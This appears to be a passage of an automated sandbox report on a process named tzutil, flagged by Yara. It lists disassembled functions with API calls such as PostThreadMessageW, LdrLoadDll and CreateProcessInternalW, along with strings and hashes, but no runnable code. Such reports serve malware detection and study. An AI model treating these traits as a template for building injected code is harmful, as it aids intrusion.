                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 79cd8ee6c42289433fbdf9569931dc3ef4526d00821e680ba76f665a6788316f
                                                              • Instruction ID: d4f94f5e6c90bfd83224f5bdb5d0cd697ae92745ba73397fd2577a75916a03bc
                                                              • Opcode Fuzzy Hash: 79cd8ee6c42289433fbdf9569931dc3ef4526d00821e680ba76f665a6788316f
                                                              • Instruction Fuzzy Hash: 4190022565546502D150B15C44446164005A7E0601F55C021A0814998D866589556221
                                                              Function 00AB114D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 429 ab114d-ab1158 430 ab115a-ab1166 429->430 431 ab11d8-ab1247 call acb890 call acc2a0 call ab4990 call aa13e0 call ac2000 429->431 432 ab1168 430->432 433 ab11c3-ab11d4 430->433 445 ab1249-ab1258 PostThreadMessageW 431->445 446 ab1267-ab126d 431->446 432->433 445->446 447 ab125a-ab1264 445->447 447->446
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00AB1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: e1c25d61a32346dc8d004d841f9ed90adaa04ebb10f9600b25de5f3ab2dbb7f9
                                                              • Instruction ID: 75813a3b0c3ec651872458c524027a89319cf5ffbe142e6cca1fc9cde7d90dca
                                                              • Opcode Fuzzy Hash: e1c25d61a32346dc8d004d841f9ed90adaa04ebb10f9600b25de5f3ab2dbb7f9
                                                              • Instruction Fuzzy Hash: 52210472E0420C7EEB01AF949C82DEEBB7CEF41394F404169F904AB142D6259E068BE1
                                                              Function 00AB11D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 448 ab11d6-ab1247 call acb890 call acc2a0 call ab4990 call aa13e0 call ac2000 460 ab1249-ab1258 PostThreadMessageW 448->460 461 ab1267-ab126d 448->461 460->461 462 ab125a-ab1264 460->462 462->461
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00AB1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 628f241b7f1b559bfb0e8fdbb7383d1f4dc0679f126a59f5884e36911a76a547
                                                              • Instruction ID: 03e0724397fa5b0fdc480384ca14bc7141fdf1819a8a4e86e740f9feeaab124f
                                                              • Opcode Fuzzy Hash: 628f241b7f1b559bfb0e8fdbb7383d1f4dc0679f126a59f5884e36911a76a547
                                                              • Instruction Fuzzy Hash: BD11A1B2D0024C7AEB10ABE44DC2EEFBB7CDF41B94F458168FA04B7241D6245E068BB1
                                                              Function 00AB11E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 463 ab11e0-ab1247 call acb890 call acc2a0 call ab4990 call aa13e0 call ac2000 474 ab1249-ab1258 PostThreadMessageW 463->474 475 ab1267-ab126d 463->475 474->475 476 ab125a-ab1264 474->476 476->475
                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00AB1254
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: f03869fda7b0d1a7782fc448fc1cae66ffdd3959067e50402559fb878f61b7a5
                                                              • Instruction ID: d13489252e207188fa8601cc543dfabebece9d0a8ae4699545b8fbb81ef9b067
                                                              • Opcode Fuzzy Hash: f03869fda7b0d1a7782fc448fc1cae66ffdd3959067e50402559fb878f61b7a5
                                                              • Instruction Fuzzy Hash: FF0192B2D0024C7AEB10ABE49D82EEFBB7CDF41794F458068FA14B7241D6345E068BB1
                                                              Function 00AC3E10 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 00AC3EDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: c03434077a262bb91a166c5ced5b1df84fe2de735978dd3df07cd974cc944c52
                                                              • Instruction ID: 2c984c9fd37c04be8276650a8bfa2d8f6533451201d03a16ffc95aabba45ac4c
                                                              • Opcode Fuzzy Hash: c03434077a262bb91a166c5ced5b1df84fe2de735978dd3df07cd974cc944c52
                                                              • Instruction Fuzzy Hash: 26315DB1A01605BBDB14DFA4CC85FEBBBB9EB88710F04851DF61D6B241D774AA408FA4
                                                              Function 00ABF8DD Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction ID: 29fb5e301b56f08a84ae44bd4999390a8fea867a291193439852219b814164d6
                                                              • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                              • Instruction Fuzzy Hash: CC313EB6A1060AAFDB00DFD8CC809EFB7B9FF88304F148559E505EB215D771AE058BA0
                                                              Function 00ABF8E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitializeUninitialize
                                                              • String ID: @J7<
                                                              • API String ID: 3442037557-2016760708
                                                              • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction ID: 7f606ddbf29d3f3a1d69c9c2c4f207997ff50afd54df7d3906d62b570e829290
                                                              • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                              • Instruction Fuzzy Hash: 25311EB6A1060AAFDB00DFD8CC809EFB7BDBF88304F148559E515AB215D775EE058BA0
                                                              Function 00AB4A0B Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction ID: b05c4bddd3990ca1042518600a246f50db3ef3d82c2919a5f8064a5683cd05bc
                                                              • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                              • Instruction Fuzzy Hash: BB219CB77802055FC315CA68D882BF9BB2CEB96365F11029CF914CB283EA215E16C7A5
                                                              Function 00AB4A25 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AB4A02
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction ID: 08fb88630604993e6fb62fb126e1059e2f51d62aac0f81728d8b4e5da8b68182
                                                              • Opcode Fuzzy Hash: aa15e0bea88f3d3eb8164487ffdb839de0913709777854031ac92b482dca4ce8
                                                              • Instruction Fuzzy Hash: 3521CA3B6401568FCB11CF28C845AEAFF6CEB9A754B2042DCD464CB243D232A80A8795
                                                              Function 00AB4990 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AB4A02
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: 006d2170dff302595bb454f687761f8e8836c78ad7265e17b0e728864cfc8ccd
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: 6C011EB5D4020DBBDB10DBA4DD42FDEB7B89B54718F004199E90C9B242F671EB15CB91
                                                              Function 00AC9B50 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,00AB8724,00000010,?,?,?,00000044,?,00000010,00AB8724,?,?,?), ref: 00AC9BB3
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction ID: de78f6568368801a48563aeda140f49cf812ab709867843c38f6a5612400e277
                                                              • Opcode Fuzzy Hash: ba0705d331adb0827d90e0a0c05e4e99946108ce1be150fedcd619b1613f899a
                                                              • Instruction Fuzzy Hash: 2901CCB2215108BBCB04DE99DC91EEB77ADEF8D754F118208FA09E3240D630F8518BA4
                                                              Function 00AA9F20 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AA9F62
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction ID: fb5c6cd1639628dc3da697d12c11b74000397ecc012c6497b94bddc520f72563
                                                              • Opcode Fuzzy Hash: c463900b9fbcea7865d729dbd8ce692ca1e0d4df9bad2f7c5cf101c691f30119
                                                              • Instruction Fuzzy Hash: 25F06D333803043AE22066E99C02FDBB79C8B85B61F15002AF70DEB1C1D992F80186A4
                                                              Function 00AA9F1A Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AA9F62
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction ID: 39256146751c569c2a858b05386bac1c221cbfcd7a7397cec159e8b6c7cc2d37
                                                              • Opcode Fuzzy Hash: 5b05dc4f9ac00e1fb97425b4699cabbd5fdff5ea68f0ab42ae6c2005985b54c1
                                                              • Instruction Fuzzy Hash: 8AF065366407103AE77166A88C02FDBA7988F96B60F25011DF609AF5C1D691B80587A5
                                                              Function 00AC9A90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00AB1E59,?,00AC5F17,00AB1E59,?,00AC5F17,?,00AB1E59,00AC59BF,00001000,?,00000000), ref: 00AC9AC9
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction ID: e50cea48dd1091ef11eaaef0bc7ce803397781d2369e6d6a43daa2f37bbbdb9c
                                                              • Opcode Fuzzy Hash: ac00b1638777126d2cea74cea7df9c0d5320b23dccd002bc6f264aef07eeb62c
                                                              • Instruction Fuzzy Hash: 21E01AB62142187BD614EF59DC42FAB77ACEFC9714F004419FA48A7241D671B9108BB9
                                                              Function 00AC9AD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,00AB4211,000000F4), ref: 00AC9B09
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction ID: 394a6e369b3c8ccbc9889adc323f4372b00c60b3512ad88c945978d3cbeac1d6
                                                              • Opcode Fuzzy Hash: b80920223b0d3d6ec0276f1483e88535983c36a14dc249cb946427c0f6602cca
                                                              • Instruction Fuzzy Hash: E0E092712003047BC610EF58DC42FAB77ACEFC9714F004418F908A7241C730B8108BB4
                                                              Function 00AB8760 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00AB878A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction ID: 1c68ffd57778a46354cb2d59c4f5caa453679d89400417e6248a802f018ba424
                                                              • Opcode Fuzzy Hash: b2fdd7f5a1d97f55da9e9883e388d1a9d0ed00b807dd1d66f4156bc78fba80a9
                                                              • Instruction Fuzzy Hash: 42E04F752402042AEB1466AC9C4AFA6335C4B88728F294A50BA1C9B2C2DD78F9418654
                                                              Function 00AB8560 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00AB2150,00AC82FF,?,00AB211B), ref: 00AB8591
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction ID: b61c7a12264230eac545a0fc02649dd4277966ddd61ea6fcecf153dedf471c3d
                                                              • Opcode Fuzzy Hash: 8078e4b5b8cf14619579fb5ecae74e25a8c9f02cfd6a8169a37789255bfbf125
                                                              • Instruction Fuzzy Hash: AFD05E723403043BFA50A6E49D43F96328C4B44751F060164BA0CEB2C2DE65F5008A75
                                                              Function 033D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9a117ff5ec4235e89a41638ba53c6b4e1e4334455608fb020473edecd9297cb7
                                                              • Instruction ID: 8381a3436e7dc68a8d9ba321903a3ca1f3ed4432ccc3681c2e9ed756b9309e47
                                                              • Opcode Fuzzy Hash: 9a117ff5ec4235e89a41638ba53c6b4e1e4334455608fb020473edecd9297cb7
                                                              • Instruction Fuzzy Hash: 6CB09B72D015D5C5DA11E7645A48717790467D0701F19C461D2034745E4739C5D5E175

                                                              Non-executed Functions

                                                              Function 031C04D0 Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2603802961.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_31c0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction ID: ba416bfc1b8a4af0de1eff4e564a61c0bbe9d0233860a19605c4e513197f0201
                                                              • Opcode Fuzzy Hash: 54c83316a2d1e38cf01f858fa1577372f4876acfbed09934fba294c8bba2248b
                                                              • Instruction Fuzzy Hash: E841067462CF4D8FD368EF6890816B6B3E1FB5D300F50062DD986C7252EB74E8468785
                                                              Function 031CE0C9 Relevance: 56.5, Strings: 45, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2603802961.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_31c0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              • Opcode ID: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction ID: 27e8e41302383a425fe5b90d81e8757c27106cfa7bf53276d2ad80067c096e69
                                                              • Opcode Fuzzy Hash: 47cf9afc285d78d3c590a56293d944d5d20f980efb9425facb2a64674c5c23be
                                                              • Instruction Fuzzy Hash: C9A161F04183948AC7158F58A0552AFFFB1EBC6305F15816DE6E6BB243C3BE8909CB95
                                                              Function 033D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 134d491460b5a5e27e8e072dc63d9f4ba88279286899497c317715ac0ee3ecf4
                                                              • Instruction ID: ce498f364e7fa2f78cdce6a849e8d57d60bed8900b912c1f2334a191af131302
                                                              • Opcode Fuzzy Hash: 134d491460b5a5e27e8e072dc63d9f4ba88279286899497c317715ac0ee3ecf4
                                                              • Instruction Fuzzy Hash: 0D51D7B7A04216BFCB20DBA8DCD097FF7B8BB08201754856AE465D7681D274DE508BA0
                                                              Function 03442410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 8aef98276f5a9b6a3f0291a8c36d25af9598b8ec7102606d199c69ef7783395c
                                                              • Instruction ID: e5703745800f0ddb921b21a84480d82b0e61b782d7dd85755f26bc6ca8a12447
                                                              • Opcode Fuzzy Hash: 8aef98276f5a9b6a3f0291a8c36d25af9598b8ec7102606d199c69ef7783395c
                                                              • Instruction Fuzzy Hash: A751F479A00645AEEB60DF9CC99097FB7B9EF44201B04886AF4A5DB781E7F4DA008764
                                                              Function 033C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ExecuteOptions, xrefs: 034046A0
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03404742
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03404725
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03404655
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03404787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034046FC
                                                              • Execute=1, xrefs: 03404713
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 2ee4808381a2222438191763d11a849718c253bd101199b829cbf30f413473c4
                                                              • Instruction ID: e95e027c56031bc9a01d0df84d29c8e8defd7e084b202ba93371a09ccd3c1595
                                                              • Opcode Fuzzy Hash: 2ee4808381a2222438191763d11a849718c253bd101199b829cbf30f413473c4
                                                              • Instruction Fuzzy Hash: 9F51E836A103596EDB20EBA5ECC5BBEB3A8AB04300F0401ADE905AF291E7719E558F54
                                                              Function 03466940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: fea2e57b5c3139510cd01bd1fc083dafc605388d27b7bbbc0e8f459401c9e321
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
